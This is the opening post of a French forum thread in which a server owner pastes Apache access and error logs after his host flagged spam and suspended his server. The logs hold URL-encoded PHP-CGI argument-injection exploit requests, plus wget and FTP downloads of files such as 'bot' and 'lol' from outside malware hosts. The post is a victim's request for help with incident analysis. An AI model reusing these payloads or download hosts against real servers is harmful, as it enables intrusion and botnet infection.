Affichage des résultats 1 à 7 sur 7

Discussion: [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

  1. #1

    Réglé [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Bonjour à tous,

    Est-ce qu'une âme charitable pourrai m'aider à analyser les logs pour trouver d'ou vient l'origine de mon probleme ?

    J'ai reçu un mail d'OVH le 9/11 "détection de spams" suivi d'un ticket "anti-hack" le 11/11 avec une mise en mode rescue de mon serveur ks3311913 (pendant le long weekend évidemment!)

    Ce serveur a été installé par OVH le 25/06 dernier sous ISPconfig 3, basé sur Debian 6.0 Squeeze .

    J'ai effectué les démarches du guide ovh rescue pour acceder aux fichiers (commande mount) et pour commencer a analyser les logs et les fichiers de mes sites pour le réactiver au plus vite.

    Sur ce serveur il n'y a qu'un site (un bug tracker (Flyspray))
    J'ai recherché dans les fichiers php une trace d'une éventuelle injection de code (style EVAL BASE64 etc.)
    Pas trouvé de script suspect... du coup je pense pas que l'origine du probleme vienne du site.

    J'ai regardé dans les logs mais je suis pas assez expérimenté pour trouver des choses suspectes.
    Voici quelques logs...

    dans /mnt/var/log/apache2/error.log
    Code:
    [Sun Nov 10 06:25:07 2013] [notice] Digest: generating secret for digest authentication ...
    [Sun Nov 10 06:25:07 2013] [notice] Digest: done
    [Sun Nov 10 06:25:07 2013] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)
    [Sun Nov 10 06:25:07 2013] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)
    [Sun Nov 10 06:25:07 2013] [notice] Apache/2.2.16 (Debian) DAV/2 mod_fcgid/2.3.6 PHP/5.3.3-7+squeeze3 with Suhosin-Patch mod_ruby/1.2.6 Ruby/1.8.7(2010-08-16) mod_ssl/2.2.16 OpenSSL/0.9.8o configured -- resuming normal operations
    [Sun Nov 10 06:25:07 2013] [warn] long lost child came home! (pid 18985)
    [Sun Nov 10 06:39:34 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Sun Nov 10 06:52:49 2013] [error] [client 93.93.189.37] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.Win32:)
    [Sun Nov 10 06:59:58 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    (...)
    [Sun Nov 10 10:26:00 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Sun Nov 10 10:32:12 2013] [error] [client 157.55.32.95] File does not exist: /var/www/robots.txt
    (...)
    [Sun Nov 10 13:00:44 2013] [error] [client 157.55.32.233] script '/var/www/index.php' not found or unable to stat
    [Sun Nov 10 13:07:42 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    (...)
    [Sun Nov 10 16:15:52 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Sun Nov 10 16:19:01 2013] [error] [client 83.168.244.29] --2013-11-10 16:19:01--  http://190.210.190.155/wordpress/wp-content/plugins/akismet/ins
    [Sun Nov 10 16:19:01 2013] [error] [client 83.168.244.29] Connecting to 190.210.190.155:80... 
    [Sun Nov 10 16:19:01 2013] [error] [client 83.168.244.29] connected.
    [Sun Nov 10 16:19:01 2013] [error] [client 83.168.244.29] HTTP request sent, awaiting response... 
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] 200 OK
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] Length: 646
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] Saving to: `ins'
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] 
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29]      0K                                                       100%  163M=0s
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] 
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] 2013-11-10 16:19:02 (163 MB/s) - `ins' saved [646/646]
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] 
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] ins: line 2: \r: command not found
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] ins: line 3: \r: command not found
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] ins: line 4: \r: command not found
    [Sun Nov 10 16:19:02 2013] [error] [client 83.168.244.29] Premature end of script headers: php5
    [Sun Nov 10 16:37:38 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    (...)
    [Sun Nov 10 21:17:06 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Sun Nov 10 21:19:33 2013] [error] [client 157.56.93.49] File does not exist: /var/www/robots.txt
    [Sun Nov 10 21:38:20 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    (...)
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] --2013-11-11 10:14:50--  http://166.78.255.118/.../unix
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] Connecting to 166.78.255.118:80... 
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] connected.
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] HTTP request sent, awaiting response... 
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] 200 OK
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] Length: 38667 (38K) [text/plain]
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] Saving to: `unix'
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] 
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155]      0K .
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ..
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ...
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] .... .
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ..
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ..
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ...
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ..
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155]  ...
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ...
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ...
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] . ..
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ...
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] ..              100%  195K=0.2s
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] 
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] 2013-11-11 10:14:50 (195 KB/s) - `unix' saved [38667/38667]
    [Mon Nov 11 10:14:50 2013] [error] [client 107.6.88.155] 
    [Mon Nov 11 10:14:51 2013] [error] [client 107.6.88.155] Premature end of script headers: php
    [Mon Nov 11 10:20:41 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Mon Nov 11 11:14:26 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Mon Nov 11 11:37:54 2013] [error] [client 93.93.189.37] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.Win32:)
    [Mon Nov 11 11:43:19 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    (...)
    [Mon Nov 11 13:59:08 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Mon Nov 11 14:23:31 2013] [error] [client 199.19.110.138] File does not exist: /var/www/webdav
    [Mon Nov 11 14:25:57 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Mon Nov 11 14:51:57 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Mon Nov 11 15:19:01 2013] [error] [client 89.187.144.63] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.test0:)
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] --2013-11-11 17:40:57--  http://update.cc.st/lol
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Resolving update.cc.st... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 82.165.130.162
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Connecting to update.cc.st|82.165.130.162|:80... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] connected.
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] HTTP request sent, awaiting response... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] sh: curl: command not found
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] --2013-11-11 17:40:57--  http://update.cc.st/c
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Resolving update.cc.st... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 82.165.130.162
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Connecting to update.cc.st|82.165.130.162|:80... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] --2013-11-11 17:40:57--  ftp://socrema-automatisme.com/bot
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]            => `bot'
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Resolving socrema-automatisme.com... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 200 OK
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Length: 6906
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]  (6.7K) [text/plain]
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Saving to: `lol'
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]      0K .
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ...
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ..          
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]                                    
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]    100%
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]  15.7M=0s
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 2013-11-11 17:40:57 (15.7 MB/s) - `lol' saved [6906/6906]
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] connected.
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] HTTP request sent, awaiting response... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] sh: curl: command not found
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] sh: fetch: command not found
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 200 OK
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Length: 269 [text/plain]
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Saving to: `c'
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]      0K                                                  
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]      100%
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]  57.6M=0s
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 2013-11-11 17:40:57 (57.6 MB/s) - `c' saved [269/269]
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 78.24.133.250
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Connecting to socrema-automatisme.com|78.24.133.250|:21... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] connected.
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Logging in as anonymous ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Logged in!
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ==> SYST ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] done.    ==> PWD ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] done.
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ==> TYPE I ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] done.  ==> CWD not needed.
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ==> SIZE bot ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 15489
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ==> PASV ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] done.    ==> RETR bot ... 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] done.
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] Length: 15489 (15K) (unauthoritative)
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119]      0K .
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] .
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ..
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ...
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] .
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] .
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] . ..
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] ...                                      100%  959K=0.02s
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 2013-11-11 17:40:57 (959 KB/s) - `bot' saved [15489]
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] 
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] sh: curl: command not found
    [Mon Nov 11 17:40:57 2013] [error] [client 46.105.124.119] sh: fetch: command not found
    [Mon Nov 11 17:45:57 2013] [warn] [client 46.105.124.119] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
    [Mon Nov 11 17:45:57 2013] [error] [client 46.105.124.119] Script timed out before returning headers: php
    [Mon Nov 11 17:45:57 2013] [warn] [client 46.105.124.119] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
    [Mon Nov 11 17:45:57 2013] [error] [client 46.105.124.119] Script timed out before returning headers: php
    [Mon Nov 11 17:50:57 2013] [warn] [client 46.105.124.119] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
    [Mon Nov 11 17:50:57 2013] [warn] [client 46.105.124.119] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
    dans /mnt/var/log/apache2/access.log

    Code:
    89.187.144.63 - - [10/Nov/2013:06:39:34 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    93.93.189.37 - - [10/Nov/2013:06:52:49 +0100] "GET /w00tw00t.at.ISC.SANS.Win32:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [10/Nov/2013:06:59:58 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [10/Nov/2013:07:40:46 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    54.200.228.27 - - [10/Nov/2013:07:41:05 +0100] "HEAD / HTTP/1.0" 200 278 "-" "-"
    93.93.189.37 - - [10/Nov/2013:07:54:14 +0100] "GET /w00tw00t.at.ISC.SANS.Win32:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [10/Nov/2013:08:01:01 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [10/Nov/2013:10:26:00 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    157.55.32.95 - - [10/Nov/2013:10:32:12 +0100] "GET /robots.txt HTTP/1.1" 404 528 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    89.187.144.63 - - [10/Nov/2013:10:46:38 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    157.55.32.95 - - [10/Nov/2013:11:01:26 +0100] "GET / HTTP/1.1" 200 486 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    89.187.144.63 - - [10/Nov/2013:11:06:31 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [10/Nov/2013:12:26:10 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    157.55.32.233 - - [10/Nov/2013:12:30:40 +0100] "GET /robots.txt HTTP/1.1" 404 528 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    89.187.144.63 - - [10/Nov/2013:12:46:58 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    157.55.32.233 - - [10/Nov/2013:13:00:44 +0100] "GET /index.php?page=perdu HTTP/1.1" 404 503 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    89.187.144.63 - - [10/Nov/2013:13:07:42 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [10/Nov/2013:14:52:46 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    156.54.121.207 - - [10/Nov/2013:15:09:28 +0100] "HEAD / HTTP/1.0" 200 278 "-" "-"
    89.187.144.63 - - [10/Nov/2013:15:13:31 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [10/Nov/2013:15:34:23 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [10/Nov/2013:15:55:04 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [10/Nov/2013:16:15:52 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    83.168.244.29 - - [10/Nov/2013:16:19:01 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 500 833 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
    89.187.144.63 - - [10/Nov/2013:16:37:38 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    
    50.22.1.232 - - [11/Nov/2013:00:17:19 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 493 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
    (...)
    89.187.144.63 - - [11/Nov/2013:00:37:43 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:01:05:25 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    50.22.1.232 - - [11/Nov/2013:01:28:40 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 493 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
    (...)
    50.22.1.232 - - [11/Nov/2013:01:28:45 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
    89.187.144.63 - - [11/Nov/2013:01:32:42 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:04:09:43 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    157.55.35.90 - - [11/Nov/2013:04:18:15 +0100] "GET /robots.txt HTTP/1.1" 404 528 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    157.55.35.90 - - [11/Nov/2013:04:19:12 +0100] "GET /index.php HTTP/1.1" 404 503 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    89.187.144.63 - - [11/Nov/2013:04:34:31 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:05:23:28 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    93.93.189.37 - - [11/Nov/2013:05:39:31 +0100] "GET /w00tw00t.at.ISC.SANS.Win32:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [11/Nov/2013:05:46:51 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:08:11:21 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    75.97.93.212 - - [11/Nov/2013:08:16:27 +0100] "\x80w\x01\x03\x01" 501 304 "-" "-"
    75.97.93.212 - - [11/Nov/2013:08:16:27 +0100] "GET /HNAP1/ HTTP/1.1" 404 502 "http://91.121.72.166/" "Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]"
    89.187.144.63 - - [11/Nov/2013:08:36:56 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    157.55.33.14 - - [11/Nov/2013:08:41:16 +0100] "GET /robots.txt HTTP/1.1" 404 528 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    157.55.33.14 - - [11/Nov/2013:08:42:33 +0100] "GET / HTTP/1.1" 200 486 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
    89.187.144.63 - - [11/Nov/2013:09:02:25 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    93.93.189.37 - - [11/Nov/2013:09:42:58 +0100] "GET /w00tw00t.at.ISC.SANS.Win32:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [11/Nov/2013:09:54:23 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    107.6.88.155 - - [11/Nov/2013:10:14:50 +0100] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 500 822 "-" "-"
    89.187.144.63 - - [11/Nov/2013:10:20:41 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    93.93.189.37 - - [11/Nov/2013:11:37:54 +0100] "GET /w00tw00t.at.ISC.SANS.Win32:) HTTP/1.1" 400 518 "-" "-"
